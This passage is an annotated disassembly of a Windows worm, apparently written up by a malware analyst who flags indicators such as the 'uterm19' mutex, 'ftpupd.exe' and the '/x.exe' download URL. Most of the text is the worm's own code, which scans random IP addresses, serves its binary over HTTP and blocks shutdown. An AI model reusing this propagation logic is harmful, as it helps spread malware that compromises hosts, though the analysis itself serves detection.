; ---------------------------------------------------------------------------

loc_314220AF: ; CODE XREF: sub_3142207E+28j
        mov esi, dword_31421104 ; labelled strstr elsewhere in this listing
        lea eax, [ebp+var_100]
        push offset aGet ; "GET"
        push eax
        call esi ; dword_31421104
        pop ecx
        test eax, eax
        pop ecx
        jz loc_3142217A
        lea eax, [ebp+var_100]
        push offset dword_314241F0
        push eax
        call esi ; dword_31421104
        pop ecx
        test eax, eax
        pop ecx
        jz loc_3142217A
        mov esi, dword_31421168
        push 0
        push 3Dh
        push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
        push ebx
        call esi ; dword_31421168
        push dword_31424FF0
        lea eax, [ebp+var_200]
        push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
        push eax
        call dword_3142111C ; wsprintfA
        add esp, 0Ch
        lea eax, [ebp+var_200]
        push 0
        push eax
        call sub_31422CDC ; strlen
        pop ecx
        push eax
        lea eax, [ebp+var_200]
        push eax
        push ebx
        call esi ; dword_31421168

loc_3142212C: ; CODE XREF: sub_3142207E+E8j
        ; chunk size = min(total - sent, 1000h)
        mov eax, dword_31424FF0
        mov ecx, 1000h
        sub eax, edi
        cmp eax, ecx
        jb short loc_3142213E
        mov eax, ecx

loc_3142213E: ; CODE XREF: sub_3142207E+BCj
        test eax, eax
        jz short loc_3142216D
        push 0
        push eax
        mov eax, dword_31424FE8
        add eax, edi
        push eax
        push ebx
        call esi ; dword_31421168
        cmp eax, 0FFFFFFFFh
        jz short loc_31422168
        cmp eax, 1000h
        jb short loc_3142216D ; short write ends the transfer
        push 64h
        add edi, eax
        call dword_31421094 ; Sleep
        jmp short loc_3142212C
; ---------------------------------------------------------------------------

loc_31422168: ; CODE XREF: sub_3142207E+D5j
        push 2

loc_3142216A: ; CODE XREF: sub_3142207E+2Cj
        pop eax
        jmp short loc_314221BD
; ---------------------------------------------------------------------------

loc_3142216D: ; CODE XREF: sub_3142207E+C2j
              ; sub_3142207E+DCj
        push offset dword_31424FEC
        call dword_314210D4 ; InterlockedIncrement
        jmp short loc_31422198
; ---------------------------------------------------------------------------

loc_3142217A: ; CODE XREF: sub_3142207E+49j
              ; sub_3142207E+61j
        mov esi, dword_31421168
        push 0
        push 15h
        push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
        push ebx
        call esi ; dword_31421168
        push 0
        push 3
        push offset dword_31424D38
        push ebx
        call esi ; dword_31421168

loc_31422198: ; CODE XREF: sub_3142207E+FAj
        push 7D0h
        call dword_31421094 ; Sleep
        push 2
        push ebx
        call dword_31421170 ; shutdown
        push ebx
        call dword_31421174 ; closesocket
        push 0
        call dword_314210D0 ; ExitThread
        xor eax, eax

loc_314221BD: ; CODE XREF: sub_3142207E+EDj
        pop edi
        pop esi
        pop ebx
        leave
        retn 4
sub_3142207E endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_314221C4 -- listener thread (started from sub_314223B2).
;   1. Reads the value "Cryptographic Service" from the HKLM (80000002h)
;      key named by aSoftwareMicros into var_130; exits the thread if it is
;      missing.
;   2. Opens that file for reading, loads it into a buffer obtained from
;      sub_31422CA5 (presumably an allocator; its body is outside this view)
;      and records pointer / length in dword_31424FE8 / dword_31424FF0.
;   3. Creates a socket(2, 1, 0), picks a port as (rand() + 7D0h) & 1FFFh,
;      rejecting values whose low or high byte is zero, stores it in
;      dword_31424FFC and retries until bind succeeds.
;   4. Listens with backlog 64h and hands every accepted connection to a
;      sub_3142207E worker thread, forever.
;   Analyst note: an unexpected listener on a random port at or below 1FFFh
;   that serves the file named by the "Cryptographic Service" value is the
;   host-side artefact of this thread.

sub_314221C4 proc near ; DATA XREF: sub_314223B2+150o

var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4

        push ebp
        mov ebp, esp
        sub esp, 130h
        push ebx
        push edi
        call sub_31421EFB
        lea eax, [ebp+var_130]
        push 104h
        push eax
        push offset aCryptographicS ; "Cryptographic Service"
        xor ebx, ebx
        push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push 80000002h
        mov dword_31424FEC, ebx ; reset the served-transfer counter
        call sub_31422882
        add esp, 14h
        test eax, eax
        jnz loc_314222F9
        push esi
        push ebx
        push ebx
        push 3
        push ebx
        push 1
        lea eax, [ebp+var_130]
        push 80000000h
        push eax
        call dword_31421080 ; CreateFileA
        mov esi, eax
        cmp esi, 0FFFFFFFFh
        jnz short loc_31422230
        push 1
        call dword_314210D0 ; ExitThread

loc_31422230: ; CODE XREF: sub_314221C4+62j
        push ebx
        push esi
        call dword_314210DC ; GetFileSize
        push eax
        mov dword_31424FF0, eax
        call sub_31422CA5
        pop ecx
        mov dword_31424FE8, eax
        lea ecx, [ebp+var_4]
        push ebx
        push ecx
        push dword_31424FF0
        push eax
        push esi
        call dword_314210D8 ; ReadFile
        mov eax, [ebp+var_4]
        push esi
        mov dword_31424FF0, eax ; length = bytes actually read
        call dword_3142107C ; CloseHandle
        push ebx
        push 1
        push 2
        call dword_31421158 ; socket
        push 10h
        mov edi, eax ; edi = listening socket
        pop esi ; esi = 10h (address structure size)
        lea eax, [ebp+var_18]
        push esi
        push ebx
        push eax
        call sub_31422CD6 ; memset
        add esp, 0Ch
        mov [ebp+var_18], 2
        mov [ebp+var_14], ebx

loc_31422292: ; CODE XREF: sub_314221C4+E5j
              ; sub_314221C4+EDj ...
        call dword_314210FC ; rand
        add eax, 7D0h
        and eax, 1FFFh
        cmp al, bl
        mov dword_31424FFC, eax ; chosen port, reused when the URL is built
        jz short loc_31422292
        xor ecx, ecx
        mov cl, ah
        test cl, cl
        jz short loc_31422292
        push eax
        call dword_31421160 ; ntohs
        mov [ebp+var_16], ax
        lea eax, [ebp+var_18]
        push esi
        push eax
        push edi
        call dword_31421140 ; bind
        test eax, eax
        jnz short loc_31422292
        push 64h
        push edi
        call dword_31421144 ; listen
        mov [ebp+var_8], esi
        pop esi

loc_314222DB: ; CODE XREF: sub_314221C4+133j
        lea eax, [ebp+var_8]
        push eax
        lea eax, [ebp+var_28]
        push eax
        push edi
        call dword_31421148 ; accept
        push eax
        push offset sub_3142207E
        call sub_31421F52
        pop ecx
        pop ecx
        jmp short loc_314222DB
; ---------------------------------------------------------------------------

loc_314222F9: ; CODE XREF: sub_314221C4+3Dj
        push ebx
        call dword_314210D0 ; ExitThread
        pop edi
        xor eax, eax
        pop ebx
        leave
        retn 4
sub_314221C4 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31422308 -- calls dword_3142113C twice with (2, buffer) and
; (102h, buffer), using a 190h-byte stack buffer. Presumably the socket
; library start-up call with two version values; confirm against the import
; table. Results are ignored.

sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FCp

var_190 = byte ptr -190h

        push ebp
        mov ebp, esp
        sub esp, 190h
        lea eax, [ebp+var_190]
        push esi
        mov esi, dword_3142113C
        push eax
        push 2
        call esi ; dword_3142113C
        lea eax, [ebp+var_190]
        push eax
        push 102h
        call esi ; dword_3142113C
        pop esi
        leave
        retn
sub_31422308 endp

; ---------------------------------------------------------------------------
; Start-up sequence (reached by a jump from UPX1:31427D08 per the XREF).
;   - saves the module base in dword_31425000
;   - deletes "ftpupd.exe" (relative path, so the current directory applies)
;   - takes the "uterm19" mutex; if the last-error value is 0B7h the process
;     exits, so only one instance runs
;   - then: sub_31421D68 (privilege), sub_314229E6 (Run-value clean-up),
;     sub_31422B67 (install / relocate), sub_31421DF0 (start sub_314223B2 in
;     another process)
;   - if sub_31421DF0 returns non-zero, sub_314223B2(0) runs in this process
; Analyst note: the mutex name "uterm19" and the file name "ftpupd.exe" are
; host indicators taken directly from this listing.

loc_31422334: ; CODE XREF: UPX1:31427D08j
        push 0
        call dword_314210B4 ; GetModuleHandleA
        push offset aFtpupd_exe ; "ftpupd.exe"
        mov dword_31425000, eax
        call dword_31421074 ; DeleteFileA
        call sub_31421EFB
        push offset aUterm19 ; "uterm19"
        call sub_31421F29
        pop ecx
        mov dword_31424FF4, eax
        call dword_314210E4 ; RtlGetLastWin32Error
        cmp eax, 0B7h
        jnz short loc_31422376
        push 1
        call dword_314210E0 ; ExitProcess

loc_31422376: ; CODE XREF: UPX0:3142236Cj
        call sub_31421D68
        call sub_314229E6
        call sub_31422B67
        push offset sub_314223B2
        call sub_31421DF0
        test eax, eax
        pop ecx
        jz short loc_3142239B
        push 0
        call sub_314223B2

loc_3142239B: ; CODE XREF: UPX0:31422392j
        xor eax, eax
        retn

; =============== S U B R O U T I N E =======================================

sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525p
                       ; sub_3142255F:loc_31422578p ...
; Body of sub_3142239E: stop-flag test. Polls the event handle in
; dword_31424FF8 with a zero timeout and returns 1 in eax when the wait
; result is 0 (event signalled), otherwise 0.
        push 0
        push dword_31424FF8
        call dword_31421070 ; WaitForSingleObject
        neg eax
        sbb eax, eax
        inc eax ; eax = (wait result == 0)
        retn
sub_3142239E endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_314223B2(arg_0) -- main worker. Runs either as a remote thread started
; by sub_31421DF0 (arg_0 = 1) or directly from the start-up code (arg_0 = 0).
;   1. Installs an exception-handler frame (fs:0).
;   2. Creates the manual-reset event "u19x" (handle kept in dword_31424FF8);
;      sub_3142239E treats it as the stop flag.
;   3. Signals the nine events "u10x" .. "u18x" if they exist.
;   4. Creates the thirteen mutexes "u8" .. "u19" (including "u13i").
;   5. When arg_0 is non-zero, loads ws2_32, wininet, msvcrt, advapi32 and
;      user32 and takes the "uterm19" mutex again.
;   6. Calls sub_31422308, then starts three threads: sub_314221C4,
;      sub_314216A2 and loc_3142276E.
;   7. Until the stop flag is set: AbortSystemShutdownA(NULL) every 1388h ms.
; Analyst note: all event and mutex names above are literal strings in this
; listing and can be used as host indicators. The purpose of steps 3 and 4
; (presumably signalling and blocking other builds that use those names) is
; an inference -- confirm against related samples.

sub_314223B2 proc near ; CODE XREF: UPX0:31422396p
                       ; DATA XREF: UPX0:31422385o

var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        push 0FFFFFFFFh
        push offset dword_31421190
        push offset loc_31422CD0
        mov eax, large fs:0
        push eax
        mov large fs:0, esp
        sub esp, 64h
        push ebx
        push esi
        push edi
        ; var_70 .. var_50: nine event names
        mov [ebp+var_70], offset aU10x ; "u10x"
        mov [ebp+var_6C], offset aU11x ; "u11x"
        mov [ebp+var_68], offset aU12x ; "u12x"
        mov [ebp+var_64], offset aU13x ; "u13x"
        mov [ebp+var_60], offset aU14x ; "u14x"
        mov [ebp+var_5C], offset aU15x ; "u15x"
        mov [ebp+var_58], offset aU16x ; "u16x"
        mov [ebp+var_54], offset aU17x ; "u17x"
        mov [ebp+var_50], offset aU18x ; "u18x"
        ; var_4C .. var_1C: thirteen mutex names
        mov [ebp+var_4C], offset aU8 ; "u8"
        mov [ebp+var_48], offset aU9 ; "u9"
        mov [ebp+var_44], offset aU10 ; "u10"
        mov [ebp+var_40], offset aU11 ; "u11"
        mov [ebp+var_3C], offset aU12 ; "u12"
        mov [ebp+var_38], offset aU13 ; "u13"
        mov [ebp+var_34], offset aU13i ; "u13i"
        mov [ebp+var_30], offset aU14 ; "u14"
        mov [ebp+var_2C], offset aU15 ; "u15"
        mov [ebp+var_28], offset aU16 ; "u16"
        mov [ebp+var_24], offset aU17 ; "u17"
        mov [ebp+var_20], offset aU18 ; "u18"
        mov [ebp+var_1C], offset aU19 ; "u19"
        push offset aU19x ; "u19x"
        xor edi, edi
        push edi
        push 1
        push edi
        call dword_3142106C ; CreateEventA
        mov dword_31424FF8, eax ; stop-flag event handle
        mov [ebp+var_4], edi
        mov [ebp+var_74], edi

loc_3142248B: ; CODE XREF: sub_314223B2+EFj
        ; for (var_74 = 0; var_74 < 9; var_74++) signal event name[var_74]
        cmp [ebp+var_74], 9
        jnb short loc_314224A3
        mov eax, [ebp+var_74]
        push [ebp+eax*4+var_70]
        call sub_3142204E
        pop ecx
        inc [ebp+var_74]
        jmp short loc_3142248B
; ---------------------------------------------------------------------------

loc_314224A3: ; CODE XREF: sub_314223B2+DDj
        mov [ebp+var_74], edi

loc_314224A6: ; CODE XREF: sub_314223B2+10Aj
        ; for (var_74 = 0; var_74 < 0Dh; var_74++) create mutex name[var_74]
        cmp [ebp+var_74], 0Dh
        jnb short loc_314224BE
        mov eax, [ebp+var_74]
        push [ebp+eax*4+var_4C]
        call sub_31421F29
        pop ecx
        inc [ebp+var_74]
        jmp short loc_314224A6
; ---------------------------------------------------------------------------

loc_314224BE: ; CODE XREF: sub_314223B2+F8j
        cmp [ebp+arg_0], edi
        jz short loc_314224FC
        push offset aWs2_32 ; "ws2_32"
        mov esi, dword_314210A8 ; labelled LoadLibraryA earlier in this listing
        call esi ; dword_314210A8
        push offset aWininet ; "wininet"
        call esi ; dword_314210A8
        push offset aMsvcrt ; "msvcrt"
        call esi ; dword_314210A8
        push offset aAdvapi32 ; "advapi32"
        call esi ; dword_314210A8
        push offset aUser32 ; "user32"
        call esi ; dword_314210A8
        push offset aUterm19 ; "uterm19"
        call sub_31421F29
        pop ecx
        mov dword_31424FF4, eax

loc_314224FC: ; CODE XREF: sub_314223B2+10Fj
        call sub_31422308
        push edi
        push offset sub_314221C4
        call sub_31421F38
        push edi
        push offset sub_314216A2
        call sub_31421F38
        push edi
        push offset loc_3142276E
        call sub_31421F38
        add esp, 18h

loc_31422525: ; CODE XREF: sub_314223B2+18Ej
        call sub_3142239E
        test eax, eax
        jnz short loc_31422542
        push edi
        call dword_31421018 ; AbortSystemShutdownA
        push 1388h
        call dword_31421094 ; Sleep
        jmp short loc_31422525
; ---------------------------------------------------------------------------

loc_31422542: ; CODE XREF: sub_314223B2+17Aj
        or [ebp+var_4], 0FFFFFFFFh
        call nullsub_2
        xor eax, eax
        mov ecx, [ebp+var_10]
        mov large fs:0, ecx ; remove the exception-handler frame
        pop edi
        pop esi
        pop ebx
        leave
        retn 4
sub_314223B2 endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_3142255F(arg_0 = 4-byte address) -- thread routine that walks the last
; byte of the address.
;   Returns 1 at once when the first byte is 7Fh. Otherwise the byte at
;   arg_0+3 is stepped from 0 to 0FEh, skipping the value it had on entry;
;   each resulting address is passed to sub_31421801, followed by a sleep of
;   (rand() % word_3142500C) + word_3142500C ms.
;   The loop ends early when the stop flag is set (sub_3142239E) or the
;   connectivity check (sub_31422038) fails. Returns 0 in those cases and at
;   the end of the walk.

sub_3142255F proc near ; DATA XREF: sub_314225C3+55o
                       ; sub_3142264B+6Ao ...

var_1 = byte ptr -1
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        push ecx
        cmp byte ptr [ebp+arg_0], 7Fh
        jnz short loc_3142256E
        push 1
        pop eax
        jmp short locret_314225BF
; ---------------------------------------------------------------------------

loc_3142256E: ; CODE XREF: sub_3142255F+8j
        mov al, byte ptr [ebp+arg_0+3]
        push ebx
        push esi
        mov [ebp+var_1], al ; remember the original last byte
        xor bl, bl

loc_31422578: ; CODE XREF: sub_3142255F+5Aj
        call sub_3142239E
        test eax, eax
        jnz short loc_314225BB
        call sub_31422038
        test eax, eax
        jz short loc_314225BB
        cmp [ebp+var_1], bl
        jz short loc_314225B4
        mov byte ptr [ebp+arg_0+3], bl
        push [ebp+arg_0]
        call sub_31421801
        movzx esi, word_3142500C
        pop ecx
        call dword_314210FC ; rand
        cdq
        idiv esi
        add edx, esi
        push edx
        call dword_31421094 ; Sleep

loc_314225B4: ; CODE XREF: sub_3142255F+2Ej
        inc bl
        cmp bl, 0FFh
        jb short loc_31422578

loc_314225BB: ; CODE XREF: sub_3142255F+20j
              ; sub_3142255F+29j
        pop esi
        xor eax, eax
        pop ebx

locret_314225BF: ; CODE XREF: sub_3142255F+Dj
        leave
        retn 4
sub_3142255F endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_314225C3(arg_0 = 4-byte address) -- thread routine that randomises the
; last two bytes of the address.
;   Returns 1 at once when the first byte is 7Fh. Otherwise, up to 8000h
;   times: replace the bytes at arg_0+2 and arg_0+3 with rand() output,
;   increment the counter dword_31425004, call sub_31421801 on the address
;   and, when that returns 0, start a sub_3142255F thread for the same
;   address. Each round ends with the same randomised sleep as in
;   sub_3142255F. Stops early on the stop flag or loss of connectivity.

sub_314225C3 proc near ; DATA XREF: sub_3142264B+7Eo
                       ; UPX0:31422803o

arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        cmp byte ptr [ebp+arg_0], 7Fh
        jnz short loc_314225D1
        push 1
        pop eax
        jmp short loc_31422647
; ---------------------------------------------------------------------------

loc_314225D1: ; CODE XREF: sub_314225C3+7j
        push ebx
        push esi
        push edi
        call sub_31421EFB
        mov esi, dword_314210FC
        xor ebx, ebx ; ebx = round counter

loc_314225E1: ; CODE XREF: sub_314225C3+7Dj
        call sub_3142239E
        test eax, eax
        jnz short loc_31422642
        call sub_31422038
        test eax, eax
        jz short loc_31422642
        call esi ; dword_314210FC
        mov byte ptr [ebp+arg_0+2], al
        call esi ; dword_314210FC
        push offset dword_31425004
        mov byte ptr [ebp+arg_0+3], al
        call dword_314210D4 ; InterlockedIncrement
        push [ebp+arg_0]
        call sub_31421801
        test eax, eax
        pop ecx
        jnz short loc_31422624
        push [ebp+arg_0]
        push offset sub_3142255F
        call sub_31421F52
        pop ecx
        pop ecx

loc_31422624: ; CODE XREF: sub_314225C3+50j
        movzx edi, word_3142500C
        call esi ; dword_314210FC
        cdq
        idiv edi
        add edx, edi
        push edx
        call dword_31421094 ; Sleep
        inc ebx
        cmp ebx, 8000h
        jl short loc_314225E1

loc_31422642: ; CODE XREF: sub_314225C3+25j
              ; sub_314225C3+2Ej
        pop edi
        pop esi
        xor eax, eax
        pop ebx

loc_31422647: ; CODE XREF: sub_314225C3+Cj
        pop ebp
        retn 4
sub_314225C3 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_3142264B -- thread routine that generates fully random 4-byte
; addresses in var_4.
;   The first byte is re-drawn while it equals 7Fh, and the whole address is
;   re-drawn when it equals the value returned by sub_31421FF9 (the local
;   address). With connectivity, the counter dword_31425004 is incremented
;   and sub_31421801 is called; a 0 result starts one sub_3142255F thread
;   and four sub_314225C3 threads for that address. Without connectivity it
;   sleeps 2710h ms. Every round ends with the randomised sleep based on
;   word_3142500C. Runs until the stop flag is set, then ExitThread(0).

sub_3142264B proc near ; DATA XREF: UPX0:3142281Bo

var_8 = dword ptr -8
var_4 = dword ptr -4

        push ebp
        mov ebp, esp
        push ecx
        push ecx
        call sub_31421EFB
        call sub_3142239E
        test eax, eax
        jnz loc_31422704
        push ebx
        mov ebx, dword_31421094 ; labelled Sleep elsewhere in this listing
        push esi
        mov esi, dword_314210FC ; labelled rand elsewhere in this listing
        push edi

loc_31422671: ; CODE XREF: sub_3142264B+48j
              ; sub_3142264B+B0j
        call esi ; dword_314210FC
        mov byte ptr [ebp+var_4+1], al
        call esi ; dword_314210FC
        mov byte ptr [ebp+var_4+3], al
        call esi ; dword_314210FC
        mov byte ptr [ebp+var_4+2], al

loc_31422680: ; CODE XREF: sub_3142264B+3Cj
        call esi ; dword_314210FC
        cmp al, 7Fh
        mov byte ptr [ebp+var_4], al
        jz short loc_31422680
        call sub_31421FF9
        mov edi, [ebp+var_4]
        cmp edi, eax
        jz short loc_31422671
        call sub_31422038
        test eax, eax
        jz short loc_314226DC
        push offset dword_31425004
        call dword_314210D4 ; InterlockedIncrement
        push edi
        call sub_31421801
        test eax, eax
        pop ecx
        jnz short loc_314226E3
        push edi
        push offset sub_3142255F
        call sub_31421F52
        pop ecx
        mov [ebp+var_8], 4 ; four sub_314225C3 threads follow
        pop ecx

loc_314226C8: ; CODE XREF: sub_3142264B+8Dj
        push edi
        push offset sub_314225C3
        call sub_31421F52
        dec [ebp+var_8]
        pop ecx
        pop ecx
        jnz short loc_314226C8
        jmp short loc_314226E3
; ---------------------------------------------------------------------------

loc_314226DC: ; CODE XREF: sub_3142264B+51j
        push 2710h
        call ebx ; dword_31421094

loc_314226E3: ; CODE XREF: sub_3142264B+67j
              ; sub_3142264B+8Fj
        movzx edi, word_3142500C
        call esi ; dword_314210FC
        cdq
        idiv edi
        add edx, edi
        push edx
        call ebx ; dword_31421094
        call sub_3142239E
        test eax, eax
        jz loc_31422671
        pop edi
        pop esi
        pop ebx

loc_31422704: ; CODE XREF: sub_3142264B+11j
        push 0
        call dword_314210D0 ; ExitThread
        xor eax, eax
        leave
        retn 4
sub_3142264B endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31422712 -- rebuilds the download URL kept in the global buffer at
; byte_314242B8.
;   Formats "http://%s:%d/x.exe" from the local address (sub_31421FF9 via
;   inet_ntoa) and the listener port in dword_31424FFC, copies the result to
;   word_314242BA (two bytes into the buffer) and then overwrites the
;   buffer's terminating zero with 0DFh.
;   The tail of sub_31421801 copies byte_314242B8 into its outgoing buffers
;   (see the strlen/memcpy pairs there).
; Analyst note: the "/x.exe" path on a high random port is a usable network
; indicator for retrieval of the served file.

sub_31422712 proc near ; CODE XREF: UPX0:314227E0p
                       ; UPX0:loc_31422846p

var_50 = byte ptr -50h
var_28 = byte ptr -28h

        push ebp
        mov ebp, esp
        sub esp, 50h
        push esi
        call sub_31421FF9
        push eax
        call dword_3142115C ; inet_ntoa
        mov esi, dword_31421068 ; KERNEL32.lstrcpyA per the import list
        push eax
        lea eax, [ebp+var_28]
        push eax
        call esi ; dword_31421068
        push dword_31424FFC
        lea eax, [ebp+var_28]
        push eax
        lea eax, [ebp+var_50]
        push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
        push eax
        call dword_3142111C ; wsprintfA
        add esp, 10h
        lea eax, [ebp+var_50]
        push eax
        push offset word_314242BA
        call esi ; dword_31421068
        push offset byte_314242B8
        call dword_31421084 ; lstrlenA
        mov byte_314242B8[eax], 0DFh
        pop esi
        leave
        retn
sub_31422712 endp

; ---------------------------------------------------------------------------
; Thread routine started from sub_314223B2 (no proc record in the listing).
;   - resets the counter dword_31425004 and waits, in 1388h ms steps, for the
;     connectivity check to succeed
;   - reads the connection flags; defaults are ebp = 50h worker threads and
;     word_3142500C = 96h; when flag bit 2 is set they become ebp = 15Eh,
;     word_3142500C = 14h and dword_31425008 = 1
;   - builds the URL (sub_31422712), then starts: one sub_3142255F thread on
;     the local address (unless it is 100007Fh), four sub_314225C3 threads on
;     the local address, and ebp sub_3142264B threads
;   - afterwards loops forever: waits for connectivity to drop, waits for it
;     to return, and rebuilds the URL
; Analyst note: the thread counts and sleep base above bound the outbound
; connection rate a host running this code can generate.

loc_3142276E: ; DATA XREF: sub_314223B2+166o
        push ecx
        push ecx
        push ebx
        push ebp
        push esi
        xor ebx, ebx
        push edi
        mov dword_31425004, ebx
        call sub_31422038
        mov esi, dword_31421094 ; labelled Sleep elsewhere in this listing
        mov edi, 1388h
        test eax, eax
        jnz short loc_3142279C

loc_31422790: ; CODE XREF: UPX0:3142279Aj
        push edi
        call esi ; dword_31421094
        call sub_31422038
        test eax, eax
        jz short loc_31422790

loc_3142279C: ; CODE XREF: UPX0:3142278Ej
        lea eax, [esp+14h]
        push ebx
        push eax
        call dword_31421130 ; InternetGetConnectedState
        test byte ptr [esp+14h], 2
        push 50h
        mov dword_31425008, ebx
        pop ebp ; ebp = 50h threads by default
        mov word_3142500C, 96h
        jz short loc_314227D9
        mov dword_31425008, 1
        mov ebp, 15Eh
        mov word_3142500C, 14h

loc_314227D9: ; CODE XREF: UPX0:314227BFj
        call sub_31421FF9
        mov ebx, eax ; ebx = local address
        call sub_31422712
        cmp ebx, 100007Fh
        jz short loc_314227FA
        push ebx
        push offset sub_3142255F
        call sub_31421F52
        pop ecx
        pop ecx

loc_314227FA: ; CODE XREF: UPX0:314227EBj
        mov dword ptr [esp+10h], 4

loc_31422802: ; CODE XREF: UPX0:31422813j
        push ebx
        push offset sub_314225C3
        call sub_31421F52
        dec dword ptr [esp+18h]
        pop ecx
        pop ecx
        jnz short loc_31422802
        test ebp, ebp
        jle short loc_3142282A

loc_31422819: ; CODE XREF: UPX0:31422828j
        push 0
        push offset sub_3142264B
        call sub_31421F52
        pop ecx
        dec ebp
        pop ecx
        jnz short loc_31422819

loc_3142282A: ; CODE XREF: UPX0:31422817j
              ; UPX0:31422836j ...
        call sub_31422038
        test eax, eax
        jz short loc_31422838
        push edi
        call esi ; dword_31421094
        jmp short loc_3142282A
; ---------------------------------------------------------------------------

loc_31422838: ; CODE XREF: UPX0:31422831j
              ; UPX0:31422844j
        call sub_31422038
        test eax, eax
        jnz short loc_31422846
        push edi
        call esi ; dword_31421094
        jmp short loc_31422838
; ---------------------------------------------------------------------------

loc_31422846: ; CODE XREF: UPX0:3142283Fj
        call sub_31422712
        jmp short loc_3142282A

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_3142284D(arg_0 = root key, arg_4 = subkey, arg_8 = value name) --
; opens the key with access 0F003Fh and deletes the named value. The opened
; handle reuses the arg_4 slot. No result is returned; a failed open is
; silently ignored.

sub_3142284D proc near ; CODE XREF: sub_314229E6+93p
                       ; sub_31422B67+11Ap

arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h

        push ebp
        mov ebp, esp
        lea eax, [ebp+arg_4]
        push eax
        push 0F003Fh
        push 0
        push [ebp+arg_4]
        push [ebp+arg_0]
        call dword_3142100C ; RegOpenKeyExA
        test eax, eax
        jnz short loc_31422880
        push [ebp+arg_8]
        push [ebp+arg_4]
        call dword_31421010 ; RegDeleteValueA
        push [ebp+arg_4]
        call dword_31421014 ; RegCloseKey

loc_31422880: ; CODE XREF: sub_3142284D+1Cj
        pop ebp
        retn
sub_3142284D endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

sub_31422882 proc near ; CODE XREF: sub_314221C4+33p
                       ; sub_314229E6+84p ...
; Body of sub_31422882(arg_0 = root key, arg_4 = subkey, arg_8 = value name,
; arg_C = output buffer, arg_10 = buffer size): reads one registry value.
;   Returns 0 on success, 1 if the key cannot be opened, 2 if the value
;   cannot be read. The arg_10 slot is reused for the key handle and the
;   arg_4 slot receives the value type.

var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h

        push ebp
        mov ebp, esp
        push ecx
        mov eax, [ebp+arg_10]
        push esi
        mov [ebp+var_4], eax ; var_4 = in/out byte count for the query
        lea eax, [ebp+arg_10]
        push eax
        xor esi, esi ; esi = return code, 0 unless the query fails
        push 0F003Fh
        push esi
        push [ebp+arg_4]
        push [ebp+arg_0]
        call dword_3142100C ; RegOpenKeyExA
        test eax, eax
        jz short loc_314228AE
        push 1
        pop eax
        jmp short loc_314228D8
; ---------------------------------------------------------------------------

loc_314228AE: ; CODE XREF: sub_31422882+25j
        lea eax, [ebp+var_4]
        push eax
        lea eax, [ebp+arg_4]
        push [ebp+arg_C]
        push eax
        push esi
        push [ebp+arg_8]
        push [ebp+arg_10]
        call dword_31421008 ; RegQueryValueExA
        test eax, eax
        jz short loc_314228CD
        push 2
        pop esi

loc_314228CD: ; CODE XREF: sub_31422882+46j
        push [ebp+arg_10]
        call dword_31421014 ; RegCloseKey
        mov eax, esi

loc_314228D8: ; CODE XREF: sub_31422882+2Aj
        pop esi
        leave
        retn
sub_31422882 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

sub_314228DB proc near ; CODE XREF: sub_31422A9B+96p
                       ; sub_31422B67+7Cp ...
; Body of sub_314228DB(arg_0 = root key, arg_4 = subkey, arg_8 = value name,
; arg_C = data, arg_10 = data length): creates/opens the key and writes the
; value with type 1.
;   Returns 0 on success, 1 if the key cannot be created, 2 if the write
;   fails. The arg_4 slot is reused for the key handle.

arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h

        push ebp
        mov ebp, esp
        push esi
        xor esi, esi
        lea eax, [ebp+arg_4]
        push esi
        push eax
        push esi
        push 0F003Fh
        push esi
        push esi
        push esi
        push [ebp+arg_4]
        push [ebp+arg_0]
        call dword_31421000 ; RegCreateKeyExA
        test eax, eax
        jz short loc_31422904
        push 1
        pop eax
        jmp short loc_3142292B
; ---------------------------------------------------------------------------

loc_31422904: ; CODE XREF: sub_314228DB+22j
        push [ebp+arg_10]
        push [ebp+arg_C]
        push 1
        push esi
        push [ebp+arg_8]
        push [ebp+arg_4]
        call dword_31421004 ; RegSetValueExA
        test eax, eax
        jz short loc_31422920
        push 2
        pop esi

